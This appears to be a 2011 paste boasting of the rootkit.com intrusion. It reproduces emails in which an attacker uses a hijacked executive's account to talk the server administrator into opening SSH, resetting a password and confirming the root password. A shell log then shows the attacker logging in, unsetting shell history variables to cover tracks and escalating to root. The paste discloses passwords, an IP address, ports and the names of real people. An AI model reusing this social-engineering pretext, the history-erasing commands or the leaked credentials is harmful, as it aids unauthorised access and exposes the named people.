
owning rootkit.com

By: a guest on Feb 8th, 2011
How to get root on rootkit.com?

Quite simple, providing:

- you have access to greg's email account
- the admin at your server is  the chief security specialist for Nokia
  (http://www.spoke.com/info/p30H9Zc/JussiJaakonaho)

--------------------------------------------------------------------------------

From: Greg Hoglund <greg@hbgary.com> Sun, Feb 6, 2011 at 1:59 PM
To: jussi <jussij@gmail.com>

im in europe and need to ssh into the server. can you drop open up
firewall and allow ssh through port 59022 or something vague?
and is our root password still 88j4bb3rw0cky88 or did we change to
88Scr3am3r88 ?
thanks

From: jussi jaakonaho <jussij@gmail.com> Sun, Feb 6, 2011 at 2:06 PM
To: Greg Hoglund <greg@hbgary.com>

hi, do you have public ip? or should i just drop fw?
and it is w0cky - tho no remote root access allowed

From: Greg Hoglund <greg@hbgary.com> Sun, Feb 6, 2011 at 2:08 PM
To: jussi jaakonaho <jussij@gmail.com>

no i dont have the public ip with me at the moment because im ready
for a small meeting and im in a rush.
if anything just reset my password to changeme123 and give me public
ip and ill ssh in and reset my pw.

From: jussi jaakonaho <jussij@gmail.com> Sun, Feb 6, 2011 at 2:10 PM
To: Greg Hoglund <greg@hbgary.com>
ok,
takes couple mins, i will mail you when ready. ssh runs on 47152

...a little later:

bash-3.2# ssh hoglund@65.74.181.141 -p 47152
[unauthorized access prohibited]
hoglund@65.74.181.141's password:
[hoglund@www hoglund]$ unset
hoglund@www hoglund]$ w
11:23:50  up 30 days,  5:45,  4 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
jussi    pts/0    cs145060.pp.htv. Wed11pm 59.00s  0.38s  0.35s  screen -r
jussi    pts/1    -                Thu 5am  1:13   0.38s  4.90s  SCREEN
jussi    pts/2    -                Thu 5am 59.00s  0.68s  4.90s  SCREEN
hoglund  pts/3    132.181.74.65.st 11:23am  0.00s  0.03s  0.00s  w
[hoglund@www hoglund]$ unset HIST
[hoglund@www hoglund]$ unset HISTFLE
[hoglund@www hoglund]$ unset HISTFILE
[hoglund@www hoglund]$ uname -a;hostname
Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST 2006 i686 i686 i386 GNU/Linux
www.rootkit.com
[hoglund@www hoglund]$ su -
Password:
[root@www root]# unset HIST
[root@www root]# unset HISTFILE
[root@www root]# uname -a;hostname;id
Linux www.rootkit.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:21:45 EST 2006 i686 i686 i386 GNU/Linux
www.rootkit.com
uid=0(root) gid=0(root) groups=0(root),1200(varmistus)